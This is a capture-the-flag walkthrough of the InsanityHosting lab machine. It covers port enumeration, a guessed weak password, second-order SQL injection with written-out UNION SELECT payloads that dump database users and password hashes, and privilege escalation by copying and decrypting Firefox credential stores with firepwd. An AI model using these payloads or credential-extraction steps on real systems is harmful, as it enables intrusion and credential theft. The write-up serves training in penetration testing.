PG - InsanityHosting

PG – InsanityHosting

In this walk through, we will be going through the InsanityHosting room from Proving Grounds. This room is rated as Hard on the platform and it consist of exploitation of Second order SQL Injection in application’s logic to get the user hash for the initial foothold. For the privilege escalation, decryption of Mozilla DB is required to get the root password. So, let’s get started without any delay.

InsanityHosting

Machine Info:

TitleInsanityHosting
IPaddress192.168.241.124
DifficultyHard
OSLinux
DescriptionInsanityHosting is a Hard Linux machine which requires thorough exploitation of Second order SQL Injection in application’s logic to get the user hash for the initial foothold. For the privilege escalation, decryption of Mozilla DB is required to get the root password.

Enumeration:

  • I stared off with my regular nmap aggressive scan and found 3 ports opened – 21 (FTP), 22 (SSH) and 80 (HTTP).

$ sudo nmap -A 192.168.241.124
[sudo] password for wh1terose: 
Starting Nmap 7.80 ( https://nmap.org ) at 2024-01-15 22:45 IST

Nmap scan report for 192.168.241.124
Host is up (0.20s latency).
Not shown: 997 filtered ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: ERROR
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.45.185
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.2 - secure, fast, stable
|_End of status
| vulners: 
|   cpe:/a:vsftpd:vsftpd:3.0.2: 
|     	PRION:CVE-2021-3618	5.8	https://vulners.com/prion/PRION:CVE-2021-3618
|_    	PRION:CVE-2015-1419	5.0	https://vulners.com/prion/PRION:CVE-2015-1419
22/tcp open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 85:46:41:06:da:83:04:01:b0:e4:1f:9b:7e:8b:31:9f (RSA)
|   256 e4:9c:b1:f2:44:f1:f0:4b:c3:80:93:a9:5d:96:98:d3 (ECDSA)
|_  256 65:cf:b4:af:ad:86:56:ef:ae:8b:bf:f2:f0:d9:be:10 (ED25519)
| vulners: 
|   cpe:/a:openbsd:openssh:7.4: 
|     	EXPLOITPACK:98FE96309F9524B8C84C508837551A19	5.8	https://vulners.com/exploitpack/EXPLOITPACK:98FE96309F9524B8C84C508837551A19	*EXPLOIT*
|     	EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97	5.8	https://vulners.com/exploitpack/EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97	*EXPLOIT*
|     	EDB-ID:46516	5.8	https://vulners.com/exploitdb/EDB-ID:46516	*EXPLOIT*
|     	EDB-ID:46193	5.8	https://vulners.com/exploitdb/EDB-ID:46193	*EXPLOIT*
|     	CVE-2019-6111	5.8	https://vulners.com/cve/CVE-2019-6111
|     	1337DAY-ID-32328	5.8	https://vulners.com/zdt/1337DAY-ID-32328*EXPLOIT*
|     	1337DAY-ID-32009	5.8	https://vulners.com/zdt/1337DAY-ID-32009*EXPLOIT*
|     	SSH_ENUM	5.0	https://vulners.com/canvas/SSH_ENUM	*EXPLOIT*
|     	PRION:CVE-2018-15919	5.0	https://vulners.com/prion/PRION:CVE-2018-15919
|     	PRION:CVE-2018-15473	5.0	https://vulners.com/prion/PRION:CVE-2018-15473
|     	PRION:CVE-2017-15906	5.0	https://vulners.com/prion/PRION:CVE-2017-15906
|     	PACKETSTORM:150621	5.0	https://vulners.com/packetstorm/PACKETSTORM:150621	*EXPLOIT*
|     	EXPLOITPACK:F957D7E8A0CC1E23C3C649B764E13FB0	5.0	https://vulners.com/exploitpack/EXPLOITPACK:F957D7E8A0CC1E23C3C649B764E13FB0	*EXPLOIT*
|     	EXPLOITPACK:EBDBC5685E3276D648B4D14B75563283	5.0	https://vulners.com/exploitpack/EXPLOITPACK:EBDBC5685E3276D648B4D14B75563283	*EXPLOIT*
|     	EDB-ID:45939	5.0	https://vulners.com/exploitdb/EDB-ID:45939	*EXPLOIT*
|     	EDB-ID:45233	5.0	https://vulners.com/exploitdb/EDB-ID:45233	*EXPLOIT*
|     	CVE-2018-15919	5.0	https://vulners.com/cve/CVE-2018-15919
|     	CVE-2018-15473	5.0	https://vulners.com/cve/CVE-2018-15473
|     	CVE-2017-15906	5.0	https://vulners.com/cve/CVE-2017-15906
|     	CVE-2016-10708	5.0	https://vulners.com/cve/CVE-2016-10708
|     	1337DAY-ID-31730	5.0	https://vulners.com/zdt/1337DAY-ID-31730*EXPLOIT*
|     	PRION:CVE-2019-16905	4.4	https://vulners.com/prion/PRION:CVE-2019-16905
|     	CVE-2020-14145	4.3	https://vulners.com/cve/CVE-2020-14145
|     	PRION:CVE-2019-6110	4.0	https://vulners.com/prion/PRION:CVE-2019-6110
|     	PRION:CVE-2019-6109	4.0	https://vulners.com/prion/PRION:CVE-2019-6109
|     	CVE-2019-6110	4.0	https://vulners.com/cve/CVE-2019-6110
|     	CVE-2019-6109	4.0	https://vulners.com/cve/CVE-2019-6109
|     	PRION:CVE-2019-6111	2.6	https://vulners.com/prion/PRION:CVE-2019-6111
|     	PRION:CVE-2018-20685	2.6	https://vulners.com/prion/PRION:CVE-2018-20685
|     	CVE-2018-20685	2.6	https://vulners.com/cve/CVE-2018-20685
|     	PACKETSTORM:151227	0.0	https://vulners.com/packetstorm/PACKETSTORM:151227	*EXPLOIT*
|     	MSF:AUXILIARY-SCANNER-SSH-SSH_ENUMUSERS-	0.0	https://vulners.com/metasploit/MSF:AUXILIARY-SCANNER-SSH-SSH_ENUMUSERS-	*EXPLOIT*
|_    	1337DAY-ID-30937	0.0	https://vulners.com/zdt/1337DAY-ID-30937*EXPLOIT*
80/tcp open  http    Apache httpd 2.4.6 ((CentOS) PHP/7.2.33)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.6 (CentOS) PHP/7.2.33
|_http-title: Insanity - UK and European Servers
| vulners: 
|   cpe:/a:apache:http_server:2.4.6: 
|     	PACKETSTORM:171631	7.5	https://vulners.com/packetstorm/PACKETSTORM:171631	*EXPLOIT*
|     	EDB-ID:51193	7.5	https://vulners.com/exploitdb/EDB-ID:51193	*EXPLOIT*
|     	CVE-2022-31813	7.5	https://vulners.com/cve/CVE-2022-31813
|     	CVE-2022-23943	7.5	https://vulners.com/cve/CVE-2022-23943
|     	CVE-2022-22720	7.5	https://vulners.com/cve/CVE-2022-22720
|     	CVE-2021-44790	7.5	https://vulners.com/cve/CVE-2021-44790
|     	CVE-2021-39275	7.5	https://vulners.com/cve/CVE-2021-39275
|     	CVE-2021-26691	7.5	https://vulners.com/cve/CVE-2021-26691
|     	CVE-2017-7679	7.5	https://vulners.com/cve/CVE-2017-7679
|     	CVE-2017-3167	7.5	https://vulners.com/cve/CVE-2017-3167
|     	CNVD-2022-73123	7.5	https://vulners.com/cnvd/CNVD-2022-73123
|     	CNVD-2022-03225	7.5	https://vulners.com/cnvd/CNVD-2022-03225
|     	CNVD-2021-102386	7.5	https://vulners.com/cnvd/CNVD-2021-102386
|     	1337DAY-ID-38427	7.5	https://vulners.com/zdt/1337DAY-ID-38427*EXPLOIT*
|     	PACKETSTORM:127546	6.8	https://vulners.com/packetstorm/PACKETSTORM:127546	*EXPLOIT*
|     	FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8	6.8	https://vulners.com/githubexploit/FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8	*EXPLOIT*
|     	CVE-2021-40438	6.8	https://vulners.com/cve/CVE-2021-40438
|     	CVE-2020-35452	6.8	https://vulners.com/cve/CVE-2020-35452
|     	CVE-2018-1312	6.8	https://vulners.com/cve/CVE-2018-1312
|     	CVE-2017-15715	6.8	https://vulners.com/cve/CVE-2017-15715
|     	CVE-2016-5387	6.8	https://vulners.com/cve/CVE-2016-5387
|     	CVE-2014-0226	6.8	https://vulners.com/cve/CVE-2014-0226
|     	CNVD-2022-03224	6.8	https://vulners.com/cnvd/CNVD-2022-03224
|     	AE3EF1CC-A0C3-5CB7-A6EF-4DAAAFA59C8C	6.8	https://vulners.com/githubexploit/AE3EF1CC-A0C3-5CB7-A6EF-4DAAAFA59C8C	*EXPLOIT*
|     	8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2	6.8	https://vulners.com/githubexploit/8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2	*EXPLOIT*
|     	4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332	6.8	https://vulners.com/githubexploit/4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332	*EXPLOIT*
|     	4373C92A-2755-5538-9C91-0469C995AA9B	6.8	https://vulners.com/githubexploit/4373C92A-2755-5538-9C91-0469C995AA9B	*EXPLOIT*
|     	36618CA8-9316-59CA-B748-82F15F407C4F	6.8	https://vulners.com/githubexploit/36618CA8-9316-59CA-B748-82F15F407C4F	*EXPLOIT*
|     	1337DAY-ID-22451	6.8	https://vulners.com/zdt/1337DAY-ID-22451*EXPLOIT*
|     	0095E929-7573-5E4A-A7FA-F6598A35E8DE	6.8	https://vulners.com/githubexploit/0095E929-7573-5E4A-A7FA-F6598A35E8DE	*EXPLOIT*
|     	OSV:BIT-2023-31122	6.4	https://vulners.com/osv/OSV:BIT-2023-31122
|     	CVE-2022-28615	6.4	https://vulners.com/cve/CVE-2022-28615
|     	CVE-2017-9788	6.4	https://vulners.com/cve/CVE-2017-9788
|     	CVE-2019-0217	6.0	https://vulners.com/cve/CVE-2019-0217
|     	CVE-2022-22721	5.8	https://vulners.com/cve/CVE-2022-22721
|     	CVE-2020-1927	5.8	https://vulners.com/cve/CVE-2020-1927
|     	CVE-2019-10098	5.8	https://vulners.com/cve/CVE-2019-10098
|     	1337DAY-ID-33577	5.8	https://vulners.com/zdt/1337DAY-ID-33577*EXPLOIT*
|     	SSV:96537	5.0	https://vulners.com/seebug/SSV:96537	*EXPLOIT*
|     	SSV:62058	5.0	https://vulners.com/seebug/SSV:62058	*EXPLOIT*
|     	SSV:61874	5.0	https://vulners.com/seebug/SSV:61874	*EXPLOIT*
|     	OSV:BIT-2023-45802	5.0	https://vulners.com/osv/OSV:BIT-2023-45802
|     	OSV:BIT-2023-43622	5.0	https://vulners.com/osv/OSV:BIT-2023-43622
|     	F7F6E599-CEF4-5E03-8E10-FE18C4101E38	5.0	https://vulners.com/githubexploit/F7F6E599-CEF4-5E03-8E10-FE18C4101E38	*EXPLOIT*
|     	EXPLOITPACK:DAED9B9E8D259B28BF72FC7FDC4755A7	5.0	https://vulners.com/exploitpack/EXPLOITPACK:DAED9B9E8D259B28BF72FC7FDC4755A7	*EXPLOIT*
|     	EXPLOITPACK:C8C256BE0BFF5FE1C0405CB0AA9C075D	5.0	https://vulners.com/exploitpack/EXPLOITPACK:C8C256BE0BFF5FE1C0405CB0AA9C075D	*EXPLOIT*
|     	EDB-ID:42745	5.0	https://vulners.com/exploitdb/EDB-ID:42745	*EXPLOIT*
|     	EDB-ID:40961	5.0	https://vulners.com/exploitdb/EDB-ID:40961	*EXPLOIT*
|     	E5C174E5-D6E8-56E0-8403-D287DE52EB3F	5.0	https://vulners.com/githubexploit/E5C174E5-D6E8-56E0-8403-D287DE52EB3F	*EXPLOIT*
|     	DB6E1BBD-08B1-574D-A351-7D6BB9898A4A	5.0	https://vulners.com/githubexploit/DB6E1BBD-08B1-574D-A351-7D6BB9898A4A	*EXPLOIT*
|     	CVE-2022-30556	5.0	https://vulners.com/cve/CVE-2022-30556
|     	CVE-2022-29404	5.0	https://vulners.com/cve/CVE-2022-29404
|     	CVE-2022-28614	5.0	https://vulners.com/cve/CVE-2022-28614
|     	CVE-2022-26377	5.0	https://vulners.com/cve/CVE-2022-26377
|     	CVE-2022-22719	5.0	https://vulners.com/cve/CVE-2022-22719
|     	CVE-2021-34798	5.0	https://vulners.com/cve/CVE-2021-34798
|     	CVE-2021-26690	5.0	https://vulners.com/cve/CVE-2021-26690
|     	CVE-2020-1934	5.0	https://vulners.com/cve/CVE-2020-1934
|     	CVE-2019-17567	5.0	https://vulners.com/cve/CVE-2019-17567
|     	CVE-2019-0220	5.0	https://vulners.com/cve/CVE-2019-0220
|     	CVE-2018-17199	5.0	https://vulners.com/cve/CVE-2018-17199
|     	CVE-2018-1303	5.0	https://vulners.com/cve/CVE-2018-1303
|     	CVE-2017-9798	5.0	https://vulners.com/cve/CVE-2017-9798
|     	CVE-2017-15710	5.0	https://vulners.com/cve/CVE-2017-15710
|     	CVE-2016-8743	5.0	https://vulners.com/cve/CVE-2016-8743
|     	CVE-2016-2161	5.0	https://vulners.com/cve/CVE-2016-2161
|     	CVE-2016-0736	5.0	https://vulners.com/cve/CVE-2016-0736
|     	CVE-2015-3183	5.0	https://vulners.com/cve/CVE-2015-3183
|     	CVE-2015-0228	5.0	https://vulners.com/cve/CVE-2015-0228
|     	CVE-2014-3581	5.0	https://vulners.com/cve/CVE-2014-3581
|     	CVE-2014-0231	5.0	https://vulners.com/cve/CVE-2014-0231
|     	CVE-2014-0098	5.0	https://vulners.com/cve/CVE-2014-0098
|     	CVE-2013-6438	5.0	https://vulners.com/cve/CVE-2013-6438
|     	CVE-2013-5704	5.0	https://vulners.com/cve/CVE-2013-5704
|     	CVE-2006-20001	5.0	https://vulners.com/cve/CVE-2006-20001
|     	CNVD-2023-93320	5.0	https://vulners.com/cnvd/CNVD-2023-93320
|     	CNVD-2023-80558	5.0	https://vulners.com/cnvd/CNVD-2023-80558
|     	CNVD-2022-73122	5.0	https://vulners.com/cnvd/CNVD-2022-73122
|     	CNVD-2022-53584	5.0	https://vulners.com/cnvd/CNVD-2022-53584
|     	CNVD-2022-53582	5.0	https://vulners.com/cnvd/CNVD-2022-53582
|     	CNVD-2022-03223	5.0	https://vulners.com/cnvd/CNVD-2022-03223
|     	C9A1C0C1-B6E3-5955-A4F1-DEA0E505B14B	5.0	https://vulners.com/githubexploit/C9A1C0C1-B6E3-5955-A4F1-DEA0E505B14B	*EXPLOIT*
|     	BD3652A9-D066-57BA-9943-4E34970463B9	5.0	https://vulners.com/githubexploit/BD3652A9-D066-57BA-9943-4E34970463B9	*EXPLOIT*
|     	B0208442-6E17-5772-B12D-B5BE30FA5540	5.0	https://vulners.com/githubexploit/B0208442-6E17-5772-B12D-B5BE30FA5540	*EXPLOIT*
|     	A820A056-9F91-5059-B0BC-8D92C7A31A52	5.0	https://vulners.com/githubexploit/A820A056-9F91-5059-B0BC-8D92C7A31A52	*EXPLOIT*
|     	9814661A-35A4-5DB7-BB25-A1040F365C81	5.0	https://vulners.com/githubexploit/9814661A-35A4-5DB7-BB25-A1040F365C81	*EXPLOIT*
|     	5A864BCC-B490-5532-83AB-2E4109BB3C31	5.0	https://vulners.com/githubexploit/5A864BCC-B490-5532-83AB-2E4109BB3C31	*EXPLOIT*
|     	17C6AD2A-8469-56C8-BBBE-1764D0DF1680	5.0	https://vulners.com/githubexploit/17C6AD2A-8469-56C8-BBBE-1764D0DF1680	*EXPLOIT*
|     	1337DAY-ID-28573	5.0	https://vulners.com/zdt/1337DAY-ID-28573*EXPLOIT*
|     	1337DAY-ID-26574	5.0	https://vulners.com/zdt/1337DAY-ID-26574*EXPLOIT*
|     	SSV:87152	4.3	https://vulners.com/seebug/SSV:87152	*EXPLOIT*
|     	PACKETSTORM:127563	4.3	https://vulners.com/packetstorm/PACKETSTORM:127563	*EXPLOIT*
|     	CVE-2020-11985	4.3	https://vulners.com/cve/CVE-2020-11985
|     	CVE-2019-10092	4.3	https://vulners.com/cve/CVE-2019-10092
|     	CVE-2018-1302	4.3	https://vulners.com/cve/CVE-2018-1302
|     	CVE-2018-1301	4.3	https://vulners.com/cve/CVE-2018-1301
|     	CVE-2016-4975	4.3	https://vulners.com/cve/CVE-2016-4975
|     	CVE-2015-3185	4.3	https://vulners.com/cve/CVE-2015-3185
|     	CVE-2014-8109	4.3	https://vulners.com/cve/CVE-2014-8109
|     	CVE-2014-0118	4.3	https://vulners.com/cve/CVE-2014-0118
|     	CVE-2014-0117	4.3	https://vulners.com/cve/CVE-2014-0117
|     	CVE-2013-4352	4.3	https://vulners.com/cve/CVE-2013-4352
|     	CVE-2013-1896	4.3	https://vulners.com/cve/CVE-2013-1896
|     	4013EC74-B3C1-5D95-938A-54197A58586D	4.3	https://vulners.com/githubexploit/4013EC74-B3C1-5D95-938A-54197A58586D	*EXPLOIT*
|     	1337DAY-ID-33575	4.3	https://vulners.com/zdt/1337DAY-ID-33575*EXPLOIT*
|     	CVE-2018-1283	3.5	https://vulners.com/cve/CVE-2018-1283
|     	CVE-2016-8612	3.3	https://vulners.com/cve/CVE-2016-8612
|_    	PACKETSTORM:140265	0.0	https://vulners.com/packetstorm/PACKETSTORM:140265	*EXPLOIT*
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Linux 3.X|4.X|2.6.X (91%)
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4.4 cpe:/o:linux:linux_kernel:2.6
Aggressive OS guesses: Linux 3.10 - 3.12 (91%), Linux 4.4 (91%), Linux 4.9 (91%), Linux 2.6.18 - 2.6.22 (86%), Linux 3.10 (86%), Linux 3.10 - 3.16 (86%), Linux 3.10 - 4.11 (85%), Linux 3.11 - 4.1 (85%), Linux 3.2 - 4.9 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 4 hops
Service Info: OS: Unix

TRACEROUTE (using port 22/tcp)
HOP RTT       ADDRESS
1   189.71 ms 192.168.45.1
2   189.68 ms 192.168.45.254
3   190.48 ms 192.168.251.1
4   190.76 ms 192.168.241.124

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 69.08 seconds

nmap scan

port 80 open

  • First started my enumeration with port 21. Logged into the server using anonymous access however was unable to get anything substantial. Tried to upload a test file on the server but don’t have permissions to do so.

$ ftp 192.168.241.124
Connected to 192.168.241.124.
220 (vsFTPd 3.0.2)
Name (192.168.241.124:wh1terose): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        0               6 Apr 01  2020 pub
226 Directory send OK.
ftp> cd pub
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> put test
local: test remote: test
200 PORT command successful. Consider using PASV.
550 Permission denied.
ftp> cd ..
250 Directory successfully changed.
ftp> put test
local: test remote: test
200 PORT command successful. Consider using PASV.
550 Permission denied.
ftp> exit
221 Goodbye.

FTP Enumeration

  • Next, moved to enumerate the web server on port 80. It reveals a static business website of a Hosting company.

Business Website

  • Looked around and found a login page but was not lucky to access it with common passwords.

Login panel

  • Fired gobuster on the target to reveal some hidden directories. Found some interesting one in the results like /news, /webmail and /phpmyadmin.

$ gobuster dir -u http://192.168.241.124/ -w ~/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.241.124/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2024/01/15 23:14:32 Starting gobuster in directory enumeration mode
===============================================================
/js                   (Status: 301) [Size: 234] [--> http://192.168.241.124/js/]
/css                  (Status: 301) [Size: 235] [--> http://192.168.241.124/css/]
/img                  (Status: 301) [Size: 235] [--> http://192.168.241.124/img/]
/data                 (Status: 301) [Size: 236] [--> http://192.168.241.124/data/]
/news                 (Status: 301) [Size: 236] [--> http://192.168.241.124/news/]
/fonts                (Status: 301) [Size: 237] [--> http://192.168.241.124/fonts/]
/webmail              (Status: 301) [Size: 239] [--> http://192.168.241.124/webmail/]
/phpmyadmin           (Status: 301) [Size: 242] [--> http://192.168.241.124/phpmyadmin/]
/monitoring           (Status: 301) [Size: 242] [--> http://192.168.241.124/monitoring/]
/licence              (Status: 200) [Size: 57]                                          
                                                                                        
===============================================================
2024/01/15 23:21:25 Finished
===============================================================

gobuster scan

  • Accessed the /news directory. Seems like a corporate blog. Nothing fancy! but it does reveal a username – otis.

Corporate blog

  • Next, moved to the next juicy directory /phpmyadmin. Tried to log into it using default creds but was unable to so.

phpmyadmin login

  • Moving on, moved to /webmail directory. This reveals a login panel again and the running Squirrel Mail version – 1.4.22.

Squirrel Mail version - 1.4.22

  • Looked for any known exploit for the concerned version and found a RCE exploit (CVE-2017-7692). However, it still require the credentials.

CVE-2017-7692

  • Back to the login page on the main website, we now know a username from the blog section. So, i tried common passwords for user “otis” and got a hit with “123456”.

  • Once logged in, we can see that it is some kind of a dashboard where we can check the status of the running hosts.

Insanity Hosting backend

  • Tried the same creds on webmail instance and it worked there as well.

Webmail backend

  • Back to our earlier found exploit, i tried to get a shell using it but it failed.

Firing the exploit

  • Now the last thing we got here is the Server status dashboard. I added a host in the application. Surprisingly, we also got a email in our mailbox from monitor@instanityhosting.vm email address stating that the test host we have entered is down. Interesting!

Server status

Initial Access:

  • Looking carefully at the mail body reveals some fields that looks like they have been pulled from a SQL Database. This indicates that the application might be vulnerable to a second order SQL Injection here.

Mail in inbox

  • I intercepted the request to add a new host via Burpsuite. Added it to the Intruder, selected the target parameter and used the wfuzz sql_inj.txt in the payload section to start the attack.

Burpsuite POST request

selecting name parameter

/usr/share/wfuzz/wordlist/vulns/sql_inj.txt

setting the payload list

Attack started

  • We will now get a lots of emails, search through them. This might take a while but we will get the output like that below confirming our SQL Injection attack.

Got result in emails

  • Next, we will enumerated the database name with the below payload. As per the result, we found DB name as “monitoring” and username as “root@localhost”.

admin" UNION SELECT NULL,NULL,user(),database()-- -

admin%22%20UNION%20SELECT%20NULL%2CNULL%2Cuser%28%29%2Cdatabase%28%29--%20-

injecting payload

Dumped DB name

  • Next, we will dump the table name from the default DB. As per the result, we got a lot of them. The interesting one to us is the “users” one.

admin" UNION SELECT table_name,NULL,NULL,NULL FROM information_schema.tables-- -

admin%22%20UNION%20SELECT%20table_name%2CNULL%2CNULL%2CNULL%20FROM%20information_schema.tables--%20-

injecting payload

Dumping Table names

Got users table

  • Next, we will dump the column names of the users table with the below payload. The result shows two interesting fields – username and password.

admin" UNION SELECT group_concat(column_name),2,3,4 FROM information_schema.columns where table_name = 'users' -- -

admin%22%20UNION%20SELECT%20group_concat%28column_name%29%2C2%2C3%2C4%20FROM%20information_schema.columns%20where%20table_name%20%3D%20%27users%27%20--%20-

injecting payload to dump columns

Dumping column names

  • At last, we will dump the contents of username and password columns. As per the result, we found three user hashes – admin, nicholas and otis.

admin" UNION SELECT id,username,password,email FROM users-- -

injecting payload to dump columns data

Dumping username & password columns

  • At this point, i tried to get access with the found password hashes but was unable to do. So, i went back to enumerate other Databases.

admin" UNION SELECT NULL,NULL,NULL,schema_name FROM information_schema.SCHEMATA-- -

Enumerating other DB

  • Dumped the username and password from the mysql.user DB. Got the hashes for user root and elliot.

admin" UNION SELECT 1,user,password,authentication_string FROM mysql.user-- -

Dumping info from the mysql.user DB

  • I was able to crack the hash of the user elliot with hashes.com.

hashes cracked

  • Logged into the target via SSH using user elliot creds and captured the local flag.

got initial access

Privilege Escalation:

  • Looking inside the elliot user directory reveals a directory related to Mozilla.

ls -la

ls -la

  • We checked for 4 files that we can use to decrypt the Mozilla Database and got access to all of them.

ls .mozilla/firefox/esmhp32w.default-default | grep -E "logins.json|cert9.db|cookies.sqlite|key4.db"

got Mozilla DB

  • Transferred them to our local machine using scp.

scp -o StrictHostKeyChecking=no -r [email protected]:/home/elliot/.mozilla/firefox/esmhp32w.default-default/cert9.db .

scp -o StrictHostKeyChecking=no -r [email protected]:/home/elliot/.mozilla/firefox/esmhp32w.default-default/cookies.sqlite .

scp -o StrictHostKeyChecking=no -r [email protected]:/home/elliot/.mozilla/firefox/esmhp32w.default-default/key4.db .

scp -o StrictHostKeyChecking=no -r [email protected]:/home/elliot/.mozilla/firefox/esmhp32w.default-default/logins.json .

Transferring files to local system

  • I used the firepwd script to crack the DB and got the password of the user root.

python3 firepwd.py key4.db

cracking the DB

  • Finally switched our user to root using the found password and captured the root flag to mark the machine as complete.

su root
S8Y389KJqWpJuSwFqFZHwfZ3GnegUa

proof flag

Also Read: PG – Hutch

Conclusion:

Conclusion

So that was “InsanityHosting” for you. We started off with a regular nmap scan and found 3 ports opened – 21 (FTP), 22 (SSH) and 80 (HTTP). Enumerated the web server on port 80 and found a static business website and a login page. Fired gobuster on the target and found a /news directory which reveals a username – otis. Back to the login panel, tried common passwords with user otis and got lucky with 123456. Upon enumerating further, found out that the application is vulnerable to second order SQL injection attack, where we can add payloads to the backend and the result will be thrown as error in Squirrel webmail. Exploiting the same, dumped the contents of mysql.user DB. Cracked the dumped hashes and got initial access as user elliot via SSH. For the privilege escalation, decrypted the found Mozilla DB using firepwd to get the root password. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top